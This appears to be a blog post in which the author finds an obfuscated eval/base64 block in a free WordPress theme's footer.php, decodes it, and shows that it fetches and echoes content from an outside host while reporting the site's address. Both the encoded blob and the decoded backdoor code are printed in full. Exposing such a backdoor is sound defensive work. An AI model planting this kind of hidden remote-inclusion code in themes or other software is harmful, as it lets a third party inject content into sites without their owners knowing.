Backdoor in WordPress themes?

I was looking for a theme to use in a WordPress blog and I stumbled on this one.

Cool, I thought, I might use it… but… hey… why there’s this weird stuff in footer.php?

1
2
3
4
5
6
7
8
<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0
NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC
ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc
5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL
vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/
b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5
p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa
hOh0EIT7b8A'
))); ?>

Uhm… it looks very suspicious. Too suspicious. Let’s change eval with die and check what’s all that stuff:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".
                  urlencode($_SERVER["HTTP_HOST"])."&uri=".
                  urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) ||
     intval(ini_get("allow_url_fopen"))) &&
     function_exists("file_get_contents")) {

    echo @file_get_contents($CodeURL);

} elseif ((intval(get_cfg_var("allow_url_fopen")) ||
            intval(ini_get("allow_url_fopen"))) && function_exists("file")) {

    $content = @file($CodeURL);
    echo @join("", $content);

} elseif (function_exists("curl_init")) {

    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

Yep. It definitely looks like a backdoor.

It seems that you can never be too much careful…

(it seems like the first version I’ve download is different than the one on the site mentioned above, although there’s still something evil in footer.php)

Leave a Reply

Your email address will not be published. Required fields are marked *